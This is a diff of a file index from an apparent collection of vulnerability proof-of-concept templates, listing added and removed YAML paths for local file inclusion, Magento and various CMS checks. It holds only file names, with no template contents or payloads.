./poc/ldap/teampass-ldap.yaml @@ -49509,48 +49487,42 @@ ./poc/local_file_inclusion/Wordpress-jQuery_Mega_Menu_Plugins-LFI.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-14.yaml ./poc/local_file_inclusion/accent-microcomputers-lfi-15.yaml -./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml -./poc/local_file_inclusion/ad-widget-lfi-124.yaml +./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml ./poc/local_file_inclusion/ad-widget-lfi-125.yaml ./poc/local_file_inclusion/ad-widget-lfi-126.yaml +./poc/local_file_inclusion/admin-word-count-column-lfi-81.yaml ./poc/local_file_inclusion/admin-word-count-column-lfi.yaml +./poc/local_file_inclusion/advanced-access-manager-lfi-116.yaml ./poc/local_file_inclusion/advanced-access-manager-lfi-117.yaml -./poc/local_file_inclusion/advanced-access-manager-lfi-118.yaml -./poc/local_file_inclusion/advanced-access-manager-lfi.yaml ./poc/local_file_inclusion/advanced-access-manager-plugin-lfi.yaml ./poc/local_file_inclusion/alertlist-lfi.yaml ./poc/local_file_inclusion/alibaba-anyproxy-lfi.yaml ./poc/local_file_inclusion/amministrazione-aperta-lfi.yaml ./poc/local_file_inclusion/apachesolrlfissrf.yaml ./poc/local_file_inclusion/asanhamayesh-cms-lfi.yaml -./poc/local_file_inclusion/asanhamayesh-lfi-552.yaml +./poc/local_file_inclusion/asanhamayesh-lfi-553.yaml ./poc/local_file_inclusion/asanhamayesh-lfi.yaml ./poc/local_file_inclusion/bems-api-lfi-707.yaml ./poc/local_file_inclusion/bems-api-lfi-708.yaml -./poc/local_file_inclusion/bems-api-lfi-709.yaml ./poc/local_file_inclusion/bems-api-lfi-710.yaml ./poc/local_file_inclusion/bems-api-lfi-711.yaml -./poc/local_file_inclusion/bems-api-lfi-712.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-755.yaml -./poc/local_file_inclusion/blue-ocean-excellence-lfi-756.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-757.yaml ./poc/local_file_inclusion/blue-ocean-excellence-lfi-758.yaml ./poc/local_file_inclusion/brandfolder-lfi-777.yaml ./poc/local_file_inclusion/brandfolder-lfi-778.yaml -./poc/local_file_inclusion/brandfolder-lfi.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-804.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-805.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-806.yaml -./poc/local_file_inclusion/bullwark-momentum-lfi-807.yaml ./poc/local_file_inclusion/bullwark-momentum-lfi-808.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi-819.yaml ./poc/local_file_inclusion/cab-fare-calculator-lfi.yaml ./poc/local_file_inclusion/candidate-application-lfi.yaml ./poc/local_file_inclusion/cherry-lfi-902.yaml +./poc/local_file_inclusion/cherry-lfi-903.yaml ./poc/local_file_inclusion/church-admin-lfi-912.yaml ./poc/local_file_inclusion/church-admin-lfi-913.yaml ./poc/local_file_inclusion/churchope-lfi-915.yaml -./poc/local_file_inclusion/churchope-lfi.yaml ./poc/local_file_inclusion/coldfusion-cve-2010-2861-lfi.yml ./poc/local_file_inclusion/comfyui-lfi.yaml ./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yaml @@ -49560,15 +49532,15 @@ ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1281.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1282.yaml ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1283.yaml -./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1285.yaml +./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1284.yaml +./poc/local_file_inclusion/cs-cart-unauthenticated-lfi.yaml ./poc/local_file_inclusion/dahua-icc-readPic-lfi.yaml -./poc/local_file_inclusion/db-backup-lfi-6774.yaml +./poc/local_file_inclusion/db-backup-lfi-6775.yaml ./poc/local_file_inclusion/db-backup-lfi-6776.yaml ./poc/local_file_inclusion/db-backup-lfi.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6990.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6991.yaml ./poc/local_file_inclusion/diarise-theme-lfi-6992.yaml -./poc/local_file_inclusion/diarise-theme-lfi.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6993.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6994.yaml ./poc/local_file_inclusion/dicoogle-pacs-lfi-6995.yaml @@ -49580,17 +49552,15 @@ ./poc/local_file_inclusion/eibiz-lfi-7186.yaml ./poc/local_file_inclusion/eibiz-lfi-7187.yaml ./poc/local_file_inclusion/eibiz-server-3-8-0-lfi.yaml -./poc/local_file_inclusion/elFinder-path-traversal.yaml ./poc/local_file_inclusion/elasticsearch-cve-2015-3337-lfi.yml ./poc/local_file_inclusion/elfinder-detect-1.yaml ./poc/local_file_inclusion/elfinder-detect-2.yaml ./poc/local_file_inclusion/elfinder-detect-7201.yaml ./poc/local_file_inclusion/elfinder-detect-7202.yaml -./poc/local_file_inclusion/elfinder-path-traversal-7203.yaml +./poc/local_file_inclusion/elfinder-path-traversal.yaml ./poc/local_file_inclusion/elfinder-rce.yaml ./poc/local_file_inclusion/elfinder-version-7204.yaml ./poc/local_file_inclusion/elfinder-version-7205.yaml -./poc/local_file_inclusion/elfinder-version.yaml ./poc/local_file_inclusion/ewebs-lfi.yaml ./poc/local_file_inclusion/fhem-6-unauthenticated-lfi.yaml ./poc/local_file_inclusion/flink-jobmanager-cve-2020-17519-lfi.yml @@ -49601,6 +49571,7 @@ ./poc/local_file_inclusion/generic-linux-lfi-7589.yaml ./poc/local_file_inclusion/generic-linux-lfi.yaml ./poc/local_file_inclusion/generic-windows-lfi-7590.yaml +./poc/local_file_inclusion/generic-windows-lfi-7591.yaml ./poc/local_file_inclusion/generic-windows-lfi-7592.yaml ./poc/local_file_inclusion/generic-windows-lfi.yaml ./poc/local_file_inclusion/geovision-geowebserver-lfi-1.yaml @@ -49612,17 +49583,20 @@ ./poc/local_file_inclusion/global-domains-lfi-7714.yaml ./poc/local_file_inclusion/global-domains-lfi-7715.yaml ./poc/local_file_inclusion/global-domains-lfi-7716.yaml +./poc/local_file_inclusion/global-domains-lfi.yaml ./poc/local_file_inclusion/goip-1-lfi-7761.yaml ./poc/local_file_inclusion/goip-1-lfi-7762.yaml ./poc/local_file_inclusion/goip-1-lfi-7763.yaml -./poc/local_file_inclusion/goip-1-lfi-7764.yaml +./poc/local_file_inclusion/groupoffice-lfi-7849.yaml ./poc/local_file_inclusion/groupoffice-lfi-7850.yaml ./poc/local_file_inclusion/groupoffice-lfi-7851.yaml +./poc/local_file_inclusion/groupoffice-lfi.yaml ./poc/local_file_inclusion/gsoap-lfi-7853.yaml ./poc/local_file_inclusion/gsoap-lfi-7854.yaml ./poc/local_file_inclusion/gsoap-lfi-7855.yaml ./poc/local_file_inclusion/gsoap-lfi-7856.yaml ./poc/local_file_inclusion/gsoap-lfi-7857.yaml +./poc/local_file_inclusion/gsoap-lfi.yaml ./poc/local_file_inclusion/hb-audio-lfi-7911.yaml ./poc/local_file_inclusion/hb-audio-lfi-7912.yaml ./poc/local_file_inclusion/hb-audio-lfi-7913.yaml @@ -49631,7 +49605,6 @@ ./poc/local_file_inclusion/hide-security-enhancer-lfi-7951.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7952.yaml ./poc/local_file_inclusion/hide-security-enhancer-lfi-7953.yaml -./poc/local_file_inclusion/hide-security-enhancer-lfi.yaml ./poc/local_file_inclusion/hikvision-orgs-download-lfi.yaml ./poc/local_file_inclusion/hjsoft-eHR-outputcode-lfi.yaml ./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8039.yaml @@ -49639,13 +49612,11 @@ ./poc/local_file_inclusion/hrsale-unauthenticated-lfi-8041.yaml ./poc/local_file_inclusion/huawei-firewall-lfi.yaml ./poc/local_file_inclusion/huawei-hg255s-lfi-8059.yaml -./poc/local_file_inclusion/huawei-hg255s-lfi-8060.yaml ./poc/local_file_inclusion/huawei-hg255s-lfi-8061.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8068.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8069.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8070.yaml ./poc/local_file_inclusion/huawei-hg659-lfi-8071.yaml -./poc/local_file_inclusion/huawei-hg659-lfi.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8101.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8102.yaml ./poc/local_file_inclusion/ibm-infoprint-lfi-8103.yaml @@ -49656,24 +49627,25 @@ ./poc/local_file_inclusion/issuu-panel-lfi-8198.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8199.yaml ./poc/local_file_inclusion/issuu-panel-lfi-8200.yaml +./poc/local_file_inclusion/issuu-panel-lfi.yaml ./poc/local_file_inclusion/jeewms-lfi-1.yaml ./poc/local_file_inclusion/jeewms-lfi-2.yaml ./poc/local_file_inclusion/jeewms-lfi-8252.yaml ./poc/local_file_inclusion/jeewms-lfi-8253.yaml ./poc/local_file_inclusion/jeewms-lfi-8254.yaml ./poc/local_file_inclusion/jeewms-lfi-8255.yaml -./poc/local_file_inclusion/jeewms-lfi.yaml -./poc/local_file_inclusion/jinfornet-jreport-lfi-8308.yaml +./poc/local_file_inclusion/jinfornet-jreport-lfi-8307.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8309.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi-8310.yaml ./poc/local_file_inclusion/jinfornet-jreport-lfi.yaml ./poc/local_file_inclusion/jinhe-oa-c6-filedownload-lfi.yaml -./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8364.yaml ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8365.yaml +./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml +./poc/local_file_inclusion/jolokia-unauthenticated-lfi.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8370.yaml -./poc/local_file_inclusion/joomla-com-fabrik-lfi-8371.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8372.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8373.yaml +./poc/local_file_inclusion/joomla-com-fabrik-lfi.yaml ./poc/local_file_inclusion/joomla-lfi-comfabrik.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8436.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8437.yaml @@ -49698,6 +49670,7 @@ ./poc/local_file_inclusion/lfi-fuzz.yaml ./poc/local_file_inclusion/lfi-j2ee.yaml ./poc/local_file_inclusion/lfi-keyed.yaml +./poc/local_file_inclusion/lfi-linux-fuzz.yaml ./poc/local_file_inclusion/lfi-linux.yaml ./poc/local_file_inclusion/lfi-vuln-params.yaml ./poc/local_file_inclusion/lfi-windows.yaml @@ -49719,13 +49692,13 @@ ./poc/local_file_inclusion/metinfo-lfi-8839.yaml ./poc/local_file_inclusion/metinfo-lfi-8840.yaml ./poc/local_file_inclusion/metinfo-lfi-cnvd-2018-13393.yml +./poc/local_file_inclusion/minimouse-lfi-8877.yaml ./poc/local_file_inclusion/minimouse-lfi-8878.yaml ./poc/local_file_inclusion/minimouse-lfi-8879.yaml ./poc/local_file_inclusion/minimouse-lfi-8880.yaml ./poc/local_file_inclusion/minimouse-lfi-8881.yaml ./poc/local_file_inclusion/minimouse-lfi.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8937.yaml -./poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8939.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8940.yaml ./poc/local_file_inclusion/moodle-filter-jmol-lfi-8941.yaml @@ -49736,7 +49709,6 @@ ./poc/local_file_inclusion/mpsec-lfi-8955.yaml ./poc/local_file_inclusion/mpsec-lfi-8956.yaml ./poc/local_file_inclusion/mpsec-lfi-8957.yaml -./poc/local_file_inclusion/mpsec-lfi.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8970.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8971.yaml ./poc/local_file_inclusion/mthemeunus-lfi.yaml @@ -49746,30 +49718,28 @@ ./poc/local_file_inclusion/oliver-library-lfi-9241.yaml ./poc/local_file_inclusion/omnia-mpx-lfi.yaml ./poc/local_file_inclusion/opencti-lfi-9267.yaml -./poc/local_file_inclusion/opencti-lfi-9268.yaml ./poc/local_file_inclusion/opensis-lfi-1.yaml ./poc/local_file_inclusion/opensis-lfi-2.yaml ./poc/local_file_inclusion/opensis-lfi-9315.yaml ./poc/local_file_inclusion/opensis-lfi-9316.yaml ./poc/local_file_inclusion/opensis-lfi-9317.yaml -./poc/local_file_inclusion/opensis-lfi.yaml ./poc/local_file_inclusion/oracle-ebs-lfi.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9378.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9380.yaml +./poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml ./poc/local_file_inclusion/orbiteam-bscw-server-lfi.yaml ./poc/local_file_inclusion/orbiteam-bscw-server-unauthenticated-lfi.yaml ./poc/local_file_inclusion/ov3-online-administration-unauthenticated-lfi.yaml ./poc/local_file_inclusion/pacsone-server-6-6-2-lfi.yaml +./poc/local_file_inclusion/pacsone-server-lfi-9428.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9429.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9430.yaml -./poc/local_file_inclusion/pacsone-server-lfi.yaml ./poc/local_file_inclusion/phpwiki-lfi-9564.yaml ./poc/local_file_inclusion/phpwiki-lfi-9565.yaml ./poc/local_file_inclusion/phpwiki-lfi-9566.yaml ./poc/local_file_inclusion/phpwiki-lfi-9567.yaml ./poc/local_file_inclusion/phpwiki-lfi-9568.yaml -./poc/local_file_inclusion/pikpikculfi.yaml ./poc/local_file_inclusion/process-maker-lfi.yaml ./poc/local_file_inclusion/processmaker-lfi-9659.yaml ./poc/local_file_inclusion/processmaker-lfi-9660.yaml @@ -49778,19 +49748,19 @@ ./poc/local_file_inclusion/qihang-media-lfi-9766.yaml ./poc/local_file_inclusion/qihang-media-lfi-9767.yaml ./poc/local_file_inclusion/qihang-media-lfi-9768.yaml -./poc/local_file_inclusion/qihang-media-lfi-9769.yaml +./poc/local_file_inclusion/qihang-media-lfi.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9938.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9939.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9941.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9942.yaml ./poc/local_file_inclusion/ruoyi-management-lfi.yaml +./poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10001.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10002.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10003.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9997.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9998.yaml -./poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml ./poc/local_file_inclusion/schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml ./poc/local_file_inclusion/selea-targa-camera-lfi.yaml ./poc/local_file_inclusion/shopxolfi.yaml @@ -49798,6 +49768,7 @@ ./poc/local_file_inclusion/shortcode-lfi-10215.yaml ./poc/local_file_inclusion/shortcode-lfi-10216.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10281.yaml +./poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi.yaml ./poc/local_file_inclusion/sitecore-lfi.yaml @@ -49805,12 +49776,14 @@ ./poc/local_file_inclusion/sl-studio-lfi-10319.yaml ./poc/local_file_inclusion/sl-studio-lfi-10320.yaml ./poc/local_file_inclusion/sl-studio-lfi-10321.yaml +./poc/local_file_inclusion/sl-studio-lfi.yaml ./poc/local_file_inclusion/sniplets-lfi-10341.yaml ./poc/local_file_inclusion/sniplets-lfi-10342.yaml ./poc/local_file_inclusion/sniplets-lfi-10343.yaml ./poc/local_file_inclusion/sniplets-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10351.yaml +./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-server-lfi.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10516.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10517.yaml @@ -49823,44 +49796,45 @@ ./poc/local_file_inclusion/targa-camera-lfi-10655.yaml ./poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml ./poc/local_file_inclusion/thinkcmf-lfi-1.yaml +./poc/local_file_inclusion/thinkcmf-lfi-10721.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10722.yaml -./poc/local_file_inclusion/thinkcmf-lfi-10723.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10724.yaml ./poc/local_file_inclusion/thinkcmf-lfi-2.yaml ./poc/local_file_inclusion/thinkcmf-lfi.yml ./poc/local_file_inclusion/thinkcmflfi.yaml ./poc/local_file_inclusion/thinkphp6-lang-lfi.yaml ./poc/local_file_inclusion/video-synchro-pdf-lfi-11006.yaml +./poc/local_file_inclusion/video-synchro-pdf-lfi-11007.yaml ./poc/local_file_inclusion/video-synchro-pdf-lfi.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-1.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-11046.yaml -./poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-11048.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-2.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-3.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11042.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11043.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11045.yaml +./poc/local_file_inclusion/vmware-vcenter-lfi.yaml ./poc/local_file_inclusion/windows-lfi-fuzz.yaml ./poc/local_file_inclusion/wordpress-LFI.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml -./poc/local_file_inclusion/wordpress-lfi.yaml +./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11349.yaml -./poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11352.yaml ./poc/local_file_inclusion/wp-brandfolder-plugin-lfi.yaml ./poc/local_file_inclusion/wp-church-admin-lfi.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11480.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11481.yaml -./poc/local_file_inclusion/wp-javospot-lfi.yaml +./poc/local_file_inclusion/wp-javospot-lfi-11482.yaml ./poc/local_file_inclusion/wp-javospot-premium-theme-lfi.yaml ./poc/local_file_inclusion/wp-localize-post-lfi.yaml ./poc/local_file_inclusion/wp-mail-masta-lfi.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-1.yaml +./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11496.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11497.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11498.yaml @@ -49878,7 +49852,6 @@ ./poc/local_file_inclusion/wp-simple-fields-lfi-11566.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11567.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11568.yaml -./poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11570.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml ./poc/local_file_inclusion/wp-site-editor-lfi.yaml @@ -49900,8 +49873,8 @@ ./poc/local_file_inclusion/wp-tutor-lfi-11597.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11598.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11599.yaml -./poc/local_file_inclusion/wp-tutor-lfi-11600.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11601.yaml +./poc/local_file_inclusion/wp-tutor-lfi.yaml ./poc/local_file_inclusion/wp-vault-lfi(1).yaml ./poc/local_file_inclusion/wp-vault-lfi-11606.yaml ./poc/local_file_inclusion/wp-vault-lfi-11607.yaml @@ -49914,6 +49887,7 @@ ./poc/local_file_inclusion/xerox-efi-lfi-11681.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11682.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11683.yaml +./poc/local_file_inclusion/xerox-efi-lfi.yaml ./poc/local_file_inclusion/xmlrpcservlet_lfi.yaml ./poc/local_file_inclusion/xxe_lfi.yaml ./poc/local_file_inclusion/yisaitong-downloadfromfile-lfi.yaml @@ -49921,6 +49895,7 @@ ./poc/local_file_inclusion/yishaadmin-lfi-11742.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11743.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml +./poc/local_file_inclusion/yishaadmin-lfi.yaml ./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml @@ -49932,9 +49907,10 @@ ./poc/magento/magento-2-exposed-api-2.yaml ./poc/magento/magento-2-exposed-api-3.yaml ./poc/magento/magento-2-exposed-api-8687.yaml +./poc/magento/magento-2-exposed-api-8688.yaml ./poc/magento/magento-2-exposed-api-8689.yaml +./poc/magento/magento-admin-panel-8690.yaml ./poc/magento/magento-admin-panel-8691.yaml -./poc/magento/magento-admin-panel-8692.yaml ./poc/magento/magento-admin-panel-8693.yaml ./poc/magento/magento-admin-panel-8694.yaml ./poc/magento/magento-admin-panel-8695.yaml @@ -49942,13 +49918,11 @@ ./poc/magento/magento-cacheleak-8696.yaml ./poc/magento/magento-cacheleak-8697.yaml ./poc/magento/magento-cacheleak-8698.yaml -./poc/magento/magento-cacheleak-8699.yaml ./poc/magento/magento-config-1.yaml ./poc/magento/magento-config-2.yaml ./poc/magento/magento-config-8700.yaml ./poc/magento/magento-config-8701.yaml ./poc/magento/magento-config-8703.yaml -./poc/magento/magento-config-disclosure.yaml ./poc/magento/magento-config.yaml ./poc/magento/magento-detect-1.yaml ./poc/magento/magento-detect-2.yaml @@ -49982,11 +49956,11 @@ ./poc/microsoft/74cms-show-sqli.yaml ./poc/microsoft/74cms-sqli-1.yaml ./poc/microsoft/74cms-sqli-1.yml -./poc/microsoft/74cms-sqli-10.yaml ./poc/microsoft/74cms-sqli-2.yaml ./poc/microsoft/74cms-sqli-2.yml ./poc/microsoft/74cms-sqli-8.yaml ./poc/microsoft/74cms-sqli-9.yaml +./poc/microsoft/74cms-sqli.yaml ./poc/microsoft/74cms-sqli.yml ./poc/microsoft/74cms-v3-Boolean-injection.yaml ./poc/microsoft/74cms-workflow.yaml @@ -50105,11 +50079,13 @@ ./poc/microsoft/aikcms_v2-poster-editphp-time-blind.yaml ./poc/microsoft/aikcms_v2-xss.yaml ./poc/microsoft/aikcms_v2_notice_edit_sqli.yaml -./poc/microsoft/aims-password-mgmt-client-218.yaml +./poc/microsoft/aims-password-mgmt-client-219.yaml ./poc/microsoft/aims-password-mgmt-client-220.yaml +./poc/microsoft/aims-password-mgmt-client-221.yaml ./poc/microsoft/aims-password-mgmt-client.yaml ./poc/microsoft/aims-password-portal-222.yaml ./poc/microsoft/aims-password-portal-223.yaml +./poc/microsoft/aims-password-portal-225.yaml ./poc/microsoft/aims-password-portal.yaml ./poc/microsoft/alibaba-group-dms.yaml ./poc/microsoft/anecms.yaml @@ -50167,10 +50143,8 @@ ./poc/microsoft/beescms_v4-login-sqli.yaml ./poc/microsoft/bems-api-lfi-707.yaml ./poc/microsoft/bems-api-lfi-708.yaml -./poc/microsoft/bems-api-lfi-709.yaml ./poc/microsoft/bems-api-lfi-710.yaml ./poc/microsoft/bems-api-lfi-711.yaml -./poc/microsoft/bems-api-lfi-712.yaml ./poc/microsoft/bentley-systems-projectwise.yaml ./poc/microsoft/bio-lims.yaml ./poc/microsoft/block-styler-for-gravity-forms-322a86f28cc5049106653fa64c408640.yaml @@ -50181,7 +50155,7 @@ ./poc/microsoft/bolt-cms-detect-760.yaml ./poc/microsoft/bolt-cms-detect.yaml ./poc/microsoft/bolt-cms-panel-761.yaml -./poc/microsoft/bolt-cms-panel-762.yaml +./poc/microsoft/bolt-cms-panel-763.yaml ./poc/microsoft/bolt-cms-panel.yaml ./poc/microsoft/booking-sms-6e9ad46ba7b82908596d92a906a7c328.yaml ./poc/microsoft/booking-sms-d025c95ce85de2f4cfa3bfa54af8279c.yaml @@ -50272,8 +50246,8 @@ ./poc/microsoft/caldera-forms-pro-plugin.yaml ./poc/microsoft/caldera-forms-pro.yaml ./poc/microsoft/caldera-forms.yaml +./poc/microsoft/call-break-cms-838.yaml ./poc/microsoft/call-break-cms-839.yaml -./poc/microsoft/call-break-cms-840.yaml ./poc/microsoft/call-break-cms.yaml ./poc/microsoft/cforms-864aa2a30cb2aac523a91326f7cc90dc.yaml ./poc/microsoft/cforms-c00364338071c029d11801e6d6d843db.yaml @@ -50298,15 +50272,15 @@ ./poc/microsoft/chamilo-lms-sqli-1.yaml ./poc/microsoft/chamilo-lms-sqli-2.yaml ./poc/microsoft/chamilo-lms-sqli-891.yaml -./poc/microsoft/chamilo-lms-sqli-892.yaml +./poc/microsoft/chamilo-lms-sqli.yaml ./poc/microsoft/chamilo-lms-xss-893.yaml ./poc/microsoft/chamilo-lms-xss-894.yaml ./poc/microsoft/chamilo-lms-xss.yaml ./poc/microsoft/chanzhicms.yaml ./poc/microsoft/chronoforms-3c97c9a74c23d051ec22745b993978f5.yaml ./poc/microsoft/chronoforms.yaml +./poc/microsoft/cisco-systems-login-973.yaml ./poc/microsoft/cisco-systems-login-974.yaml -./poc/microsoft/cisco-systems-login-975.yaml ./poc/microsoft/cisco-systems-login.yaml ./poc/microsoft/cluevo-lms-6a1d6ebcef69edeed5f796acb8a5f731.yaml ./poc/microsoft/cluevo-lms-78892043fdf34c1dee70d29718c1a4c1.yaml @@ -50389,7 +50363,6 @@ ./poc/microsoft/couchcms-cve-2018-7662.yml ./poc/microsoft/craft-cms-detect-1246.yaml ./poc/microsoft/craft-cms-detect-1247.yaml -./poc/microsoft/craft-cms-detect.yaml ./poc/microsoft/craftcms-admin-panel.yaml ./poc/microsoft/craftcms-seomatic-cve-2020-9757-rce.yml ./poc/microsoft/craftercms-detect.yaml @@ -50446,17 +50419,18 @@ ./poc/microsoft/decon-wp-sms-17d0e92e2b742bf4ba974f8caec96975.yaml ./poc/microsoft/decon-wp-sms.yaml ./poc/microsoft/dede-cms-radminpass-disclosure.yaml -./poc/microsoft/dedecms-carbuyaction-fileinclude-6792.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude-6793.yaml +./poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml +./poc/microsoft/dedecms-carbuyaction-fileinclude.yaml ./poc/microsoft/dedecms-carbuyaction-fileinclude.yml ./poc/microsoft/dedecms-cve-2018-6910.yml ./poc/microsoft/dedecms-cve-2018-7700-rce.yml ./poc/microsoft/dedecms-guestbook-sqli.yaml ./poc/microsoft/dedecms-guestbook-sqli.yml +./poc/microsoft/dedecms-membergroup-sqli-6796.yaml ./poc/microsoft/dedecms-membergroup-sqli-6797.yaml ./poc/microsoft/dedecms-membergroup-sqli-6798.yaml ./poc/microsoft/dedecms-membergroup-sqli-6799.yaml -./poc/microsoft/dedecms-membergroup-sqli.yaml ./poc/microsoft/dedecms-membergroup-sqli.yml ./poc/microsoft/dedecms-openredirect-6800.yaml ./poc/microsoft/dedecms-openredirect-6801.yaml @@ -50484,12 +50458,11 @@ ./poc/microsoft/dnatools-dnalims.yaml ./poc/microsoft/doccms.yaml ./poc/microsoft/docebolms.yaml -./poc/microsoft/dotcms-admin-panel-7085.yaml ./poc/microsoft/dotcms-admin-panel-7086.yaml +./poc/microsoft/dotcms-admin-panel-7087.yaml ./poc/microsoft/dotcms-admin-panel.yaml ./poc/microsoft/dotcms-version-detect.yaml ./poc/microsoft/dotnetcms-sqli-7089.yaml -./poc/microsoft/dotnetcms-sqli.yaml ./poc/microsoft/dotnetcms-sqli.yml ./poc/microsoft/drupal_module-comscore_direct-cross-site-scripting.yaml ./poc/microsoft/drupal_module-config_perms-access-bypass.yaml @@ -50498,7 +50471,9 @@ ./poc/microsoft/drupal_module-spamspan-cross-site-scripting.yaml ./poc/microsoft/duomicms-sql-injection-7122.yaml ./poc/microsoft/duomicms-sql-injection-7123.yaml +./poc/microsoft/duomicms-sql-injection-7124.yaml 